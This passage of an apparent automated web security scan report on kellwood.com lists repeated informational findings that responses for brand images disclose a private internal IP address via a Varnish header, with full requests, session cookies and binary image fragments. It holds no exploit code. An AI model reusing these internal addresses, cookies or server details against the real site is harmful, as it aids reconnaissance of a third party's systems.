......Exif..II*.................Ducky.......F.....&Adobe.d...........
..3...Fi..q......................................
.                .

.....
...........................

..................................
...[SNIP]...
14.56. http://kellwood.com/brand_images/xoxo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/xoxo.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/xoxo.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "0e221fc8cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:24 GMT
X-Powered-By: ASP.NET
Content-Length: 82737
Date: Mon, 11 Apr 2011 17:19:52 GMT
X-Varnish: 2009433484
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
..F...x....L..C/.................................
.                .

.....
...........................

..................................
...[SNIP]...
14.57. http://kellwood.com/brand_text/text_adam.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_adam.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_adam.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "0721da93754cb1:0"
Last-Modified: Tue, 14 Sep 2010 18:07:14 GMT
X-Powered-By: ASP.NET
Content-Length: 7870
Date: Mon, 11 Apr 2011 17:20:00 GMT
X-Varnish: 2009436759
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...`IDATx..]-t..r.}q@. .#...    .... `%..1.H.. .y.........J.2.E%j....;.    ....@.4...........5..?....g...>3s.v............._..V    _=.....3
...[SNIP]...
14.58. http://kellwood.com/brand_text/text_babyphat.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_babyphat.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_babyphat.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "5a43e82c3b54cb1:0"
Last-Modified: Tue, 14 Sep 2010 18:32:24 GMT
X-Powered-By: ASP.NET
Content-Length: 10020
Date: Mon, 11 Apr 2011 17:20:02 GMT
X-Varnish: 2009438032
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR....... ......Xr.....tEXtSoftware.Adobe ImageReadyq.e<..&.IDATx..]-p..r.{....    ...x..Z.$U.@.L.$.J.|A@d*..H...~.!WT6.E%j.....L.V dE.. .*.#.z...kz[..gvv.?.Umiu......sf.......?...J......?k
...[SNIP]...
14.59. http://kellwood.com/brand_text/text_blkdnm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_blkdnm.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_blkdnm.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "64fd73c679ecb1:0"
Last-Modified: Fri, 17 Dec 2010 16:30:54 GMT
X-Powered-By: ASP.NET
Content-Length: 4836
Date: Mon, 11 Apr 2011 17:20:00 GMT
X-Varnish: 2009436819
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR....... ......Xr.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1T.9..u..rZ..[..)...BKR.iIKR..^.$ep.-i...kMkZ....>...y.FZ...!..{...Zi..............?.?.s...eC..^/3g.8.....\/..<....3..
...[SNIP]...
14.60. http://kellwood.com/brand_text/text_briggs.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_briggs.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_briggs.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "dead04d1441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:18 GMT
X-Powered-By: ASP.NET
Content-Length: 13739
Date: Mon, 11 Apr 2011 17:20:01 GMT
X-Varnish: 2009437501
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......F.......U....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.61. http://kellwood.com/brand_text/text_davidmeister.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_davidmeister.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_davidmeister.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "60ca2a4d1441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:18 GMT
X-Powered-By: ASP.NET
Content-Length: 14030
Date: Mon, 11 Apr 2011 17:20:00 GMT
X-Varnish: 2009436734
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......D............    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.62. http://kellwood.com/brand_text/text_democracy.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_democracy.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_democracy.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "16b1dda755ecb1:0"
Last-Modified: Thu, 17 Jun 2010 19:45:36 GMT
X-Powered-By: ASP.NET
Content-Length: 12947
Date: Mon, 11 Apr 2011 17:20:01 GMT
X-Varnish: 2009437459
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR....... ......_B.....tEXtSoftware.Adobe ImageReadyq.e<..25IDATx....O.@....Lu.T. ....f.......&.......33X..........H...s..%...../..~.z.{...Z.ZyeYG....6.y[m>e_.    C\..=.*..K\7d.#.EB(Li..M.
...[SNIP]...
14.63. http://kellwood.com/brand_text/text_jax.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_jax.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_jax.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "12486e4fd234cb1:0"
Last-Modified: Thu, 05 Aug 2010 19:13:39 GMT
X-Powered-By: ASP.NET
Content-Length: 8328
Date: Mon, 11 Apr 2011 17:20:00 GMT
X-Varnish: 2009437206
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.............a.S.....tEXtSoftware.Adobe ImageReadyq.e<.. *IDATx...1..0..[..................+qv.G..+...xM^..!....%.G.4....M..."..)..cEl.....0....'..5......D........[yb&...!..Ad    .S.....
...[SNIP]...
14.64. http://kellwood.com/brand_text/text_jolt.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_jolt.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_jolt.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "ac129f4e1441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:20 GMT
X-Powered-By: ASP.NET
Content-Length: 9933
Date: Mon, 11 Apr 2011 17:20:00 GMT
X-Varnish: 2009436854
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.............6z.....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.65. http://kellwood.com/brand_text/text_koret.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_koret.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_koret.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "def1c94e1441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:21 GMT
X-Powered-By: ASP.NET
Content-Length: 11670
Date: Mon, 11 Apr 2011 17:20:02 GMT
X-Varnish: 2009437891
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR................^...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.66. http://kellwood.com/brand_text/text_mymichelle.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_mymichelle.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_mymichelle.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "60ceed4e1441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:21 GMT
X-Powered-By: ASP.NET
Content-Length: 6468
Date: Mon, 11 Apr 2011 17:20:00 GMT
X-Varnish: 2009436856
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR..............q......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]!x.I....@.........h.0
..M..M.C........P.&t..2..L-r Z. .u.zS.W.....V.......]]]]..3]]..}E..Z..f...*..s(....:...r........
...[SNIP]...
14.67. http://kellwood.com/brand_text/text_phatfarm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_phatfarm.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_phatfarm.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "264f501441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:23 GMT
X-Powered-By: ASP.NET
Content-Length: 16014
Date: Mon, 11 Apr 2011 17:20:02 GMT
X-Varnish: 2009438073
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......s.....a......    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.68. http://kellwood.com/brand_text/text_rebeccataylor.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_rebeccataylor.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_rebeccataylor.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "ccaccf5aeaecb1:0"
Last-Modified: Fri, 07 Jan 2011 21:07:58 GMT
X-Powered-By: ASP.NET
Content-Length: 8243
Date: Mon, 11 Apr 2011 17:19:59 GMT
X-Varnish: 2009436263
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR....... ......Xr.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]-p.I.......w..v...P.....#.%2...9 ..E...L...........m.........[.....-P.......s..........i...ET.T.?/_~..U.../~......./.
...[SNIP]...
14.69. http://kellwood.com/brand_text/text_rewind.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_rewind.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_rewind.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "dcddc2b2eb63ca1:0"
Last-Modified: Thu, 12 Nov 2009 22:58:50 GMT
X-Powered-By: ASP.NET
Content-Length: 8842
Date: Mon, 11 Apr 2011 17:20:01 GMT
X-Varnish: 2009437420
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.............q].....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.70. http://kellwood.com/brand_text/text_sagharbor.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_sagharbor.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_sagharbor.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "48a351511441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:25 GMT
X-Powered-By: ASP.NET
Content-Length: 13308
Date: Mon, 11 Apr 2011 17:20:01 GMT
X-Varnish: 2009437526
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......I.....,7....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.71. http://kellwood.com/brand_text/text_sangria.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_sangria.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_sangria.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "b0a7394fd234cb1:0"
Last-Modified: Thu, 05 Aug 2010 19:13:38 GMT
X-Powered-By: ASP.NET
Content-Length: 8462
Date: Mon, 11 Apr 2011 17:20:01 GMT
X-Varnish: 2009437437
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR..............Z.G....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx.b` ..........^..A@,
.o....w.q.....a..~ V.Z....A.o0.....[ ........B..1.q6._..1.....5..,.|....."...
M$..P.1T<......>......
...[SNIP]...
14.72. http://kellwood.com/brand_text/text_vince.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_vince.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_vince.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "622c94521441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:27 GMT
X-Powered-By: ASP.NET
Content-Length: 10810
Date: Mon, 11 Apr 2011 17:19:59 GMT
X-Varnish: 2009436258
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.............c......    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.73. http://kellwood.com/brand_text/text_xoxo.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_text/text_xoxo.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_text/text_xoxo.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
